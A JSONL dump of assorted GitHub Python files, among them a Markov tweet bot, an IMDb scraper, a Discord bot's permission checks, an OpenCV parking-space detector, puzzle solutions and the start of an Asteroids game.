word_dict_two[(lastTwo, lastOne)]))) == 0:\n chain[-1] = random.choice(random_word)\n else:\n chain.pop()\n else:\n if len(list(filter(lambda x: not \"<|endoftext|>\" in x, word_dict_one[lastOne]))) == 0:\n chain[-1] = random.choice(random_word)\n else:\n chain.pop()\n\n if chain[-1] == \"<|emojiblock|>\":\n chain[-1] = generate_emojiblock(emoji_dict_one)\n if chain[-2] == \"<|emojiblock|>\":\n chain[-2] = generate_emojiblock(emoji_dict_one)\n \n if count_tweet(' '.join(chain)) > 280:\n break\n else:\n tweetText = ' '.join(chain)\n\n tweetText = tweetText.replace(\"<|endoftext|>\", '')\n tweetText = tweetText[0:279]\n\n return tweetText\n\n\nif __name__ == \"__main__\":\n chain_data = load_corpus('morning_dataset.txt')\n\n for i in range(100):\n print(generate_tweet(chain_data))\n","repo_name":"Azimath/ohaio_bot","sub_path":"ohaio_markov.py","file_name":"ohaio_markov.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"20136466390","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom operator import itemgetter\n\n#Faça o mesmo procedimento da questão anterior para a página: http://www.imdb.com/chart/boxoffice\n\ndef download(url, num_retries=2):\n\tprint('Downloading data from:', url)\n\tpage = None\n\ttry:\n\t\tresponse = requests.get(url)\n\t\tpage = response.text\n\t\tif response.status_code >= 400:\n\t\t\tprint('Download error:', response.text)\n\t\tif num_retries and 500 <= response.status_code < 600:\n\t\t\treturn download(url, num_retries - 1)\n\texcept requests.exceptions.RequestException as e:\n\t\tprint('Download error:', e.reason)\n\treturn page\n\n# testing...\nhtml = download('https://www.imdb.com/chart/boxoffice')\nsoup = bs(html, 'html.parser')\n\nmovies_div = soup.find('table', class_='chart full-width')\n\nvalues = [float(movie.get_text().replace(' ','').replace('\\n','').replace('$','').replace('M','')) for movie in movies_div.find_all('td', 'ratingColumn')]\nweekends = values[0::2]\ngrosses = values[1::2]\nnames = [movie.get_text().replace('\\n','').replace(' ','') for movie in movies_div.find_all('a', href=True) if movie.get_text().replace('\\n','').replace(' ','')!='']\nweeks = [int(week.get_text()) for week in movies_div.find_all('td',class_='weeksColumn')]\nmovies = sorted([{'name':name, 'weekend':weekend, 'gross':gross, 'week':week } for name, weekend, gross, week in zip(names,weekends,grosses,weeks)], key=itemgetter('weekend'), reverse=True)\n\nprint('weeks | weekend (US$ Mi)| gross (US$ Mi) | name')\nprint('-----------------------------------------------')\nfor movie in movies:\t\n\tprint(\"%s%s| %s%s| %s%s | %s\"%(movie['week'],(6-len(str(movie['week'])))*' ',movie['weekend'],(16-len(str(movie['weekend'])))*' ',movie['gross'],(14-len(str(movie['gross'])))*' ',movie['name']))\n","repo_name":"fabiomsrs/ml_class","sub_path":"atividade01/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10460046738","text":"from flask import Flask, render_template_string\n\n# https://www.digitalocean.com/community/tutorials/how-to-use-python-markdown-to-convert-markdown-text-to-html\n\nimport markdown\n\napp = Flask(__name__)\n\n\n@app.route('/lesson')\ndef lesson():\n with open('./lesson1/in-this-chapter.md', 'r') as f:\n chapter_text = f.read()\n html = markdown.markdown(chapter_text)\n return html\n\n\n@app.route('/exercises')\ndef exercises():\n with open('./lesson1/exercises.md') as f:\n exercises_text = f.read()\n html = markdown.markdown(exercises_text)\n return html\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n","repo_name":"emmanuelle1234/di_exercices","sub_path":"week_11/day_2/Daily Challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34437445289","text":"import pytest\nfrom unittest.mock import MagicMock, patch\nfrom decimal import Decimal\nfrom ..src.db_writer import DBWriter\n\n\n@pytest.fixture\ndef sample_data():\n return {\n \"controllers\": [\n {\n \"callsign\": \"TEST_CALLSIGN\",\n \"controller_id\": \"TEST_ID\",\n \"logon_time\": \"20230619100000\",\n \"session_id\": \"TEST_SESSION_ID\",\n \"duration\": Decimal(60.00)\n }\n ]\n }\n\n\n@patch(\"data_collection.src.db_writer.DBClient\")\n@patch(\"data_collection.src.db_writer.ControllerFilter\")\n@patch(\"data_collection.src.db_writer.ControllerDataPreparer\")\ndef test_write(MockControllerDataPreparer, MockControllerFilter, MockDBClient, sample_data):\n # Add an existing controller to the return value of get_all_items\n MockDBClient.return_value.get_all_items.return_value = [sample_data[\"controllers\"][0]]\n\n MockControllerFilter.return_value.filter_data.return_value = sample_data[\"controllers\"]\n MockControllerDataPreparer.return_value.prepare_new_controller.return_value = sample_data[\"controllers\"][0]\n MockControllerDataPreparer.return_value.format_existing_controller.return_value = sample_data[\"controllers\"][0]\n\n db_writer = DBWriter(sample_data)\n result = db_writer.write()\n\n # Assert the DBClient, ControllerFilter and ControllerDataPreparer methods were called correctly\n MockDBClient.return_value.get_all_items.assert_called_once()\n MockControllerFilter.return_value.filter_data.assert_called_once()\n MockControllerDataPreparer.return_value.prepare_new_controller.assert_called_with(sample_data[\"controllers\"][0])\n MockControllerDataPreparer.return_value.format_existing_controller.assert_called_with(sample_data[\"controllers\"][0])\n\n # Assert the DBClient update_item method was called with the correct arguments\n MockDBClient.return_value.update_item.assert_called_with(sample_data[\"controllers\"][0], sample_data[\"controllers\"][0]['duration'])\n\n # Assert the result is as expected\n assert result == {'num_controllers': 1, 'num_new_controllers': 0, 'num_existing_controllers': 1}\n","repo_name":"nyartcc/application-vattix","sub_path":"lambda_function/data_collection/tests/test_db_writer.py","file_name":"test_db_writer.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15315816929","text":"import sys\n\ninput = sys.stdin.readline\n\ndic = {\n 1: \"1.,?!\",\n 2: \"2ABC\",\n 3: \"3DEF\",\n 4: \"4GHI\",\n 5: \"5JKL\",\n 6: \"6MNO\",\n 7: \"7PQRS\",\n 8: \"8TUV\",\n 9: \"9WXYZ\"\n}\n\nn = int(input())\ncom = input()\n\nans = \"\"\ncnt = 0\nfor i in range(n):\n if com[i] == com[i + 1]:\n cnt += 1\n else:\n cnt %= len(dic[int(com[i])])\n ans += dic[int(com[i])][cnt]\n cnt = 0\n\nprint(ans)\n","repo_name":"leegusrb/python","sub_path":"algorithm_monday/3-2_review.py","file_name":"3-2_review.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31108607789","text":"from statistics import median\n\ndef parse_input(path):\n with open(path) as f:\n positions = list(map(int, f.read().split(',')))\n return positions\n\ndef calc_pt1(input):\n med = median(input)\n return sum([abs(med - pos) for pos in input])\n\ndef calc_pt2(input):\n fuels = []\n for dest in range(min(input) + 1, max(input)):\n fuel = 0\n for pos in input:\n diff = abs(dest - pos)\n fuel += (diff / 2) * (1 + diff)\n fuels.append(fuel)\n return min(fuels)\n\ninput = parse_input('input.txt')\nresult = calc_pt1(input)\nprint(result)","repo_name":"julia-martin/advent-of-code-2021","sub_path":"day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19803586968","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"graph_lib_constantin_ruhdorfer\",\n version=\"1.1.0\",\n author=\"Constantin Ruhdorfer\",\n author_email=\"constantin.ruhdorfer@gmnx.de\",\n description=\"A small library for representing graphs for the class of Combinatorial Optimization at Baden-Wuerttemberg Cooperative State University Stuttgart.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ConstantinRuhdorfer/GraphLib\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"ConstantinRuhdorfer/GraphLib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7120091794","text":"from ctypes import DEFAULT_MODE\nfrom subprocess import DETACHED_PROCESS\n\n\nclass No:\n def __init__(self,dado):\n self.dado=dado\n self.proximo=None\n self.anterior=None\n\nclass Lista_Dupla:\n def __init__(self):\n self.inicio=None\n self.fim=None\n self.tamanho=0\n \n def vazia(self):\n if self.inicio is None:\n return True\n else:\n return False\n \n def adicionar_inicio(self,valor):\n no=No(valor)\n if self.vazia():\n self.inicio=self.fim=no\n else:\n no.proximo=self.inicio\n self.inicio.anterior=no\n no.anterior=None\n self.inicio=no\n self.tamanho+=1\n\n def adicionar_fim(self,valor):\n no=No(valor)\n if self.vazia():\n self.inicio=self.fim=no\n else:\n self.fim.proximo=no\n no.anterior=self.fim\n no.proximo=None\n self.fim=no\n self.tamanho+=1\n \n def inserir_indice(self,i,valor):\n metade=int(self.tamanho/2)\n if i>self.tamanho:\n raise IndexError(\"Posição na memória invalida\")\n elif i==self.tamanho:\n self.adicionar_fim(valor)\n elif i==0:\n self.adicionar_inicio(valor)\n else:\n if i<= metade:\n no=No(valor)\n corrente=self.inicio\n cont=0\n while cont<(i-1):\n corrente=corrente.proximo\n cont+=1\n no.proximo=corrente.proximo\n corrente.proximo.anterior=no\n corrente.proximo=no\n no.anterior=corrente\n else:\n no=No(valor)\n corrente=self.fim\n cont=self.tamanho\n while cont>i:\n corrente=corrente.anterior\n cont-=1\n no.proximo=corrente.proximo\n corrente.proximo.anterior=no\n corrente.proximo=no\n no.anterior=corrente\n self.tamanho+=1\n\n def remover_inicio(self):\n if self.vazia():\n raise TypeError(\"Lista está vazia!\")\n elif self.tamanho==1:\n self.inicio=None\n self.fim=None\n else: \n self.inicio=self.inicio.proximo\n self.inicio.anterior=None\n self.tamanho-=1\n \n def remover_fim(self):\n if self.vazia():\n raise TypeError(\"Lista está vazia!\")\n elif self.tamanho==1:\n self.remover_inicio()\n else:\n self.fim=self.fim.anterior\n self.fim.proximo=None\n self.tamanho-=1\n \n def remover_index(self,i):\n if self.vazia(self):\n raise TypeError(\"Lista vazia!\")\n elif i==0:\n self.remover_inicio()\n elif i==self.tamanho-1:\n self.remover_fim()\n else:\n corrente=self.inicio\n cont=0\n while cont int:\n result = 0\n nums.sort()\n\n for i in range(len(nums)):\n a = nums[i]\n b = target - a\n if b < a:\n break\n\n other = bisect_right(nums, b)\n between = other - i - 1\n # each number between a and b can be there or not => like bits in a binary numbers\n result += 2**between\n\n result %= 10**9 + 7\n\n return result\n","repo_name":"stbrumme/leetcode","sub_path":"1498.py","file_name":"1498.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33495700410","text":"import imutils\nimport numpy as np\nimport cv2\nfrom random import randint\n\nfrom extract_car import extract_car\nfrom extract_rectangle import extract_rectangle\n\n\ndef extract_parking(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n ret, thresh = cv2.threshold(gray, 127, 255, 1)\n\n # cv2.imshow('Resultat', thresh)\n # cv2.waitKey(0)\n\n kernel = np.ones((3, 3), np.uint8)\n # res = cv2.erode(thresh,kernel,iterations = 1)\n # kernel = np.ones((11, 11), np.uint8)\n res = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n kernel = np.ones((9, 9), np.uint8)\n res = cv2.dilate(res, kernel, iterations=3)\n # res = cv2.erode(res, kernel, iterations=1)\n\n\n # cv2.imshow('Resultat', res)\n # cv2.waitKey(0)\n # sobelx = cv2.Sobel(res, cv2.CV_8U, 1, 0, ksize=5)\n #\n # cv2.imshow('Resultat', sobelx)\n # cv2.waitKey(0)\n #\n # kernel = np.ones((7, 3), np.uint8)\n # res = cv2.morphologyEx(sobelx, cv2.MORPH_OPEN, kernel)\n #\n # cv2.imshow('Resultat', res)\n # cv2.waitKey(0)\n contours, hierarchy = cv2.findContours(res, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in contours:\n if cv2.contourArea(cnt) < 1000:\n continue\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n cv2.drawContours(res, [box], 0, (255, 255, 255), 20)\n # cv2.rectangle(res, (x, y), (x + w, y + h), (255,255,255), 20)\n\n # cv2.drawContours(img, [cnt], 0, (randint(0,255), randint(0,255), randint(0,255)), -1)\n\n return res\n\n\nif __name__ == \"__main__\":\n name = \"Data/parking_occupied.jpg\"\n\n img = cv2.imread(name)\n\n res = extract_parking(img)\n\n res = extract_rectangle(img, res)\n res = extract_car(img, res)\n\n cv2.imshow('Resultat', res)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"blanclemjk/Hackatown2019","sub_path":"camera_receiver/extract_parking.py","file_name":"extract_parking.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39151094636","text":"import re\n\nmonkeys = dict()\n\nclass Monkey:\n def __init__(self, operation=None, a=None, b=None, value = None) -> None:\n self.operation = operation\n self.a = a\n self.b = b\n self.value = value\n pass\n\n def __str__(self) -> str:\n if self.operation != None:\n return self.a + ' ' + self.b\n else:\n return str(self.value)\n\n def getValue(self):\n if self.value == None:\n a = monkeys[self.a]\n b = monkeys[self.b]\n self.value = self.operation(a.getValue(), b.getValue())\n return self.value\n\ndef add(a,b): return a+b\ndef sub(a,b): return a-b\ndef mul(a,b): return a*b\ndef div(a,b): return a/b\noperations = {\n '+': add,\n '-': sub,\n '*': mul,\n '/': div\n}\n\nexpressionWithValue = re.compile('([a-z]{4}): ([0-9]+)')\nexpressionWithOperation = re.compile('([a-z]{4}): ([a-z]{4}) ([+\\-*/]) ([a-z]{4})')\n\nwith open('./input.txt', 'r') as input:\n#with open('./example.txt', 'r') as input:\n for line in input:\n matchWithValue = expressionWithValue.match(line)\n if matchWithValue != None:\n monkeys[matchWithValue.group(1)] = Monkey(value=int(matchWithValue.group(2)))\n else:\n matchWithOperation = expressionWithOperation.match(line)\n operation = operations[matchWithOperation.group(3)]\n a = matchWithOperation.group(2)\n b = matchWithOperation.group(4)\n monkeys[matchWithOperation.group(1)] = Monkey(operation=operation, a=a, b=b)\n\nprint(monkeys['root'].getValue())","repo_name":"Rialgar/AdventOfCode2022","sub_path":"21/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70142794003","text":"import discord\r\nimport asyncio\r\n\r\nfrom discord.ext import commands, menus\r\n\r\nfrom Utilities import AssetCreation\r\n\r\nimport asyncpg\r\n\r\nclass NoChar(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasChar(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass AlreadyInAssociation(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotBrotherhoodMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotGuildMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotCollegeMember(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsNotAssociationLeader(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsAssociationLeader(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IsNotAssociationOfficer(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass AssociationFull(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotAdmin(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotMayor(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass NotComptroller(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasNoBankAccount(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass HasBankAccount(commands.CheckFailure):\r\n def __init__(self, user, *args, **kwargs):\r\n self.user = user\r\n super().__init__(*args, **kwargs)\r\n\r\nclass IncorrectOccupation(commands.CheckFailure):\r\n def __init__(self, occupation, player_class, prefix, *args, **kwargs):\r\n self.message = f'This command is exclusive to the **{occupation}** class only, but you are a **{player_class}**. If you wish to change classes, do `{prefix}class {occupation}`.'\r\n super().__init__(message=self.message, *args, **kwargs)\r\n\r\nclass WordChainError(commands.CommandError):\r\n pass\r\n\r\nasync def not_player(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if result is None: #Then there is no char for this id\r\n return True\r\n else:\r\n raise HasChar(ctx.author, message='Player has a character and failed not_player check.')\r\n\r\nasync def is_player(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if result is not None: #Then there is a char for this id\r\n return True\r\n else:\r\n raise NoChar(ctx.message.author, message='Player does not have a character. Failed is_player check.')\r\n\r\nasync def has_char(pool, user : discord.user): #NOT A CHECK --> in-function version of is_player\r\n async with pool.acquire() as conn:\r\n result = await conn.fetchrow('SELECT user_id FROM players WHERE user_id = $1', user.id)\r\n await pool.release(conn)\r\n \r\n if result is not None: #Then there is a char for this id\r\n return True\r\n\r\nasync def not_in_guild(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if guild is None:\r\n return True\r\n else:\r\n raise AlreadyInAssociation(ctx.author, message='Player is in an association. Failed not_in_guild check.')\r\n\r\nasync def target_not_in_guild(pool, user : discord.user): #NOT A CHECK --> in-function version of not_in_guilf\r\n async with pool.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', user.id)\r\n await pool.release(conn)\r\n \r\n if guild is None:\r\n return True\r\n\r\nasync def in_brotherhood(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchrow('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n \r\n if guild[0] is None:\r\n raise NotBrotherhoodMember(ctx.author, message='Failed in_brotherhood check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild[0])\r\n if guild_type == 'Brotherhood':\r\n return True\r\n else:\r\n raise NotBrotherhoodMember(ctx.author, message='Failed in_brotherhood check.')\r\n\r\nasync def in_guild(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n if guild is None:\r\n raise NotGuildMember(ctx.author, message='Failed in_guild check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild)\r\n if guild_type == 'Guild':\r\n return True \r\n else:\r\n raise NotGuildMember(ctx.author, message='Failed in_guild check.') \r\n\r\nasync def in_college(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n guild = await conn.fetchval('SELECT guild FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n if guild is None:\r\n raise NotCollegeMember(ctx.author, message='Failed in_college check.')\r\n else:\r\n guild_type = await conn.fetchval('SELECT guild_type FROM guilds WHERE guild_id = $1', guild)\r\n if guild_type == 'College':\r\n return True \r\n else:\r\n raise NotCollegeMember(ctx.author, message='Failed in_guild check.') \r\n\r\nasync def guild_can_be_created(ctx, name): #NOT A CHECK\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n is_taken = await conn.fetchrow('SELECT guild_id FROM guilds WHERE guild_name = $1', name)\r\n if is_taken is not None:\r\n await ctx.reply('This name is already taken.')\r\n await ctx.bot.pg_con.release(conn)\r\n return\r\n gold = await conn.fetchrow('SELECT gold FROM players WHERE user_id = $1', ctx.author.id)\r\n if gold[0] < 15000:\r\n await ctx.reply('You don\\'t have enough money form a brotherhood.')\r\n await ctx.bot.pg_con.release(conn)\r\n return\r\n await ctx.bot.pg_con.release(conn)\r\n return True #Otherwise we're good to go\r\n\r\nasync def is_guild_leader(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n playerrank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', ctx.author.id)\r\n\r\n if playerrank == 'Leader':\r\n return True\r\n else:\r\n raise IsNotAssociationLeader(ctx.author, message='Player is not an association leader. Failed is_guild_leader check.')\r\n\r\nasync def is_not_guild_leader(ctx):\r\n player_guild = await AssetCreation.getGuildFromPlayer(ctx.bot.pg_con, ctx.author.id)\r\n if ctx.author.id != player_guild['Leader']:\r\n return True\r\n else:\r\n raise IsAssociationLeader(ctx.author, message='Player failed is_not_guild_leader check.')\r\n\r\nasync def is_guild_officer(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n rank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', ctx.author.id)\r\n await ctx.bot.pg_con.release(conn)\r\n \r\n if rank == 'Officer' or rank == 'Leader':\r\n return True\r\n else:\r\n raise IsNotAssociationOfficer(ctx.author, message='Player failed is_guild_officer check.')\r\n\r\nasync def target_is_guild_officer(pool, user_id : int): #NOT A CHECK\r\n async with pool.acquire() as conn:\r\n rank = await conn.fetchval('SELECT guild_rank FROM players WHERE user_id = $1', user_id)\r\n await pool.release(conn)\r\n\r\n if rank == 'Officer' or rank == 'Leader':\r\n return True\r\n\r\n else:\r\n return False\r\n\r\nasync def guild_has_vacancy(ctx): \r\n guild = await AssetCreation.getGuildFromPlayer(ctx.bot.pg_con, ctx.author.id)\r\n members = await AssetCreation.getGuildMemberCount(ctx.bot.pg_con, guild['ID'])\r\n capacity = await AssetCreation.getGuildCapacity(ctx.bot.pg_con, guild['ID'])\r\n if members < capacity:\r\n return True\r\n else:\r\n raise AssociationFull(ctx.author, message='Guild is full. Failed guild_has_vacancy check.')\r\n\r\nasync def target_guild_has_vacancy(pool, guild_id : int): #NOT A CHECK. ALT VERSION OF guild_has_vacancy\r\n guild = await AssetCreation.getGuildByID(pool, guild_id)\r\n members = await AssetCreation.getGuildMemberCount(pool, guild['ID'])\r\n capacity = await AssetCreation.getGuildCapacity(pool, guild['ID'])\r\n if members < capacity:\r\n return True \r\n\r\nadmins = [196465885148479489, 325080171591761921, 530760994289483790, 465388103792590878] #Seb, Sean, Demi, Bort\r\nasync def is_admin(ctx):\r\n if ctx.author.id in admins:\r\n return True\r\n else:\r\n raise NotAdmin(ctx.author, message='Failed is_admin check.')\r\n\r\nasync def is_mayor(ctx):\r\n offices = await AssetCreation.get_officeholders(ctx.bot.pg_con)\r\n if ctx.author.id == offices['Mayor_ID']:\r\n return True\r\n else:\r\n raise NotMayor(ctx.author, message='Failed is_mayor check.')\r\n\r\nasync def is_comptroller(ctx):\r\n offices = await AssetCreation.get_officeholders(ctx.bot.pg_con)\r\n if ctx.author.id == offices['Comptroller_ID']:\r\n return True\r\n else:\r\n raise NotComptroller(ctx.author, message='Failed is_comptroller check.')\r\n\r\nasync def has_bank_account(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n account = await conn.fetchval('SELECT id FROM guild_bank_account WHERE user_id = $1', ctx.author.id)\r\n if account:\r\n return True\r\n else:\r\n raise HasNoBankAccount(ctx.author, message='User lacks a guild bank account. Failed has_bank_account check.')\r\n\r\nasync def not_has_bank_account(ctx):\r\n async with ctx.bot.pg_con.acquire() as conn:\r\n account = await conn.fetchval('SELECT id FROM guild_bank_account WHERE user_id = $1', ctx.author.id)\r\n if not account:\r\n return True\r\n else:\r\n raise HasBankAccount(ctx.author, message='Failed not_has_bank_account check.')\r\n\r\nasync def is_blacksmith(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Blacksmith'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_farmer(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Farmer'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_hunter(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Hunter'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_butcher(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Butcher'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)\r\n\r\nasync def is_scribe(ctx):\r\n player_class = await AssetCreation.getClass(ctx.bot.pg_con, ctx.author.id)\r\n occupation = 'Scribe'\r\n if player_class == occupation:\r\n return True\r\n else:\r\n raise IncorrectOccupation(occupation, player_class, ctx.prefix)","repo_name":"seanathan-discordbot/Ayesha_Bot","sub_path":"Utilities/Checks.py","file_name":"Checks.py","file_ext":"py","file_size_in_byte":12773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"17206324802","text":"\"\"\"\n\"RiceRocks\"\n(simple clone of the game Asteroids by Atari)\n\nStudent: Jared Cooney\njaredcooney2@gmail.com\n\nRuns in CodeSkulptor (Python 2)\ncodeskulptor.org\n\"\"\"\n\nimport simplegui\nimport math\nimport random\n\n# global constants\nWIDTH = 800\nHEIGHT = 600\nFRAME = (WIDTH, HEIGHT)\nMAX_ROCKS = 12\nSTARTING_LIVES = 3\nSAFE_RADIUS_SCALAR = 4.5\n\n# global variables\nscore = 0\nlives = STARTING_LIVES\ntime = 0\nstarted = False\nmin_rock_vel = -0.5\nmax_rock_vel = 0.5\nrock_vel_range = max_rock_vel - min_rock_vel\nsound_count1 = 0\nsound_count2 = 0\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 55)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot1.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 48, True)\nexplosion_image = 